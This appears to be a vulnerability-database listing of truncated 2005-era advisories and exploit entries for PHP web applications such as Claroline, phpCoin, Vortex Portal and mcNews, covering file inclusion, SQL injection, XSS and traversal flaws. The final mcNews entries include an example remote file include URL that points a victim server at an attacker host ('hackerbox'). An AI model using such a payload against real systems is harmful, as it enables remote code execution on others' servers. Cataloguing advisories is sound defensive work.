Claroline < 1.5.4 / 1.6.0 Multiple Vulnerabilities (RFI, SQLi, XSS, Traversal)

The version of Claroline an open source, collaborative learning environment installed on the remote host suffers from a number of remotely-exploitable vulnerabilities, including: - Multiple Remote File Include Vulnerabilities Four scripts let an attacker read arbitrary files on the remote host an...

Claroline E-Learning 1.51.6 - exercises_details.php?exo_id SQL Injection

Claroline E-Learning 1.51.6 - exercisesdetails.php?exoid SQL Injection source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize...

Claroline 1.51.6 - myagenda.php?coursePath Cross-Site Scripting

Claroline 1.51.6 - myagenda.php?coursePath Cross-Site Scripting source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied...

Claroline 1.5/1.6 - &#039;user_access_details.php?data&#039; Cross-Site Scripting

source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application...

Claroline 1.5/1.6 - &#039;myagenda.php?coursePath&#039; Cross-Site Scripting

source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application...

yappa-ng < 2.3.2 Multiple Vulnerabilities

The version of yappa-ng installed on the remote host is prone to multiple file include and cross-site scripting vulnerabilities due to its failure to sanitize user-supplied script input when calling various include scripts directly. By exploiting the file include vulnerabilities, an attacker can...

Claroline 1.51.6 - user_access_details.php?data Cross-Site Scripting

Claroline 1.51.6 - useraccessdetails.php?data Cross-Site Scripting source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied...

Claroline 1.51.6 - toolaccess_details.php?tool Cross-Site Scripting

Claroline 1.51.6 - toolaccessdetails.php?tool Cross-Site Scripting source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied...

Claroline E-Learning 1.51.6 - userInfo.php Multiple SQL Injections

Claroline E-Learning 1.51.6 - userInfo.php Multiple SQL Injections source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied...

Claroline E-Learning 1.5/1.6 - &#039;userInfo.php&#039; Multiple SQL Injections

source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application...

Claroline 1.5/1.6 - &#039;toolaccess_details.php?tool&#039; Cross-Site Scripting

source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application...

AlstraSoft20.txt

This is a multi-part message in MIME format. ------=NextPart000001201C53726.5C0BF6A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory Hsc Security Group http://www.hackerscenter.com/...

ModernBill <= 4.3.0 Multiple Vulnerabilities

The version of ModernBill installed on the remote host is subject to multiple vulnerabilities : - A Remote File Include Vulnerability The application fails to sanitize the parameter 'DIR' before using it in the script 'news.php'. An attacker can exploit this flaw to browse or execute arbitrary...

phpCoin 1.2 - auxpage.php?page Traversal Arbitrary File Access

phpCoin 1.2 - auxpage.php?page Traversal Arbitrary File Access source: https://www.securityfocus.com/bid/12917/info Multiple remote input validation vulnerabilities affect phpCoin. Multiple SQL injection vulnerabilities have been reported. An attacker may leverage these issues to manipulate and...

phpCoin 1.2 - &#039;auxpage.php?page&#039; Traversal Arbitrary File Access

source: https://www.securityfocus.com/bid/12917/info Multiple remote input validation vulnerabilities affect phpCoin. Multiple SQL injection vulnerabilities have been reported. An attacker may leverage these issues to manipulate and view arbitrary database contents. phpCoin is also affected by a...

CVE-2005-0879

CVE-2005-0879 affects Vortex Portal Content Management System. It is a PHP remote file inclusion flaw in content.php and index.php that lets an attacker execute arbitrary PHP code by passing a URL in the act parameter. Documented impact per NVD: partial confidentiality, integrity, and availabilit...

Vortex Portal 2.0 - content.php?act Remote File Inclusion

Vortex Portal 2.0 - content.php?act Remote File Inclusion source: https://www.securityfocus.com/bid/12878/info Vortex Portal is reportedly affected by a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user supplied input. It is...

McNews 1.x - &#039;install.php&#039; Arbitrary File Inclusion

source: https://www.securityfocus.com/bid/12835/info mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script. This issue is reported to affect mcNews versions 1.3 a...

PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ============================================================== PHP mcNews = 1.3 skinfile Remote File Include Vulnerability ============================================================== Example: if registerglobals=on and allowurlfopen=on:...

PHP mcNews &lt;= 1.3 (skinfile) Remote File Include Vulnerability

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...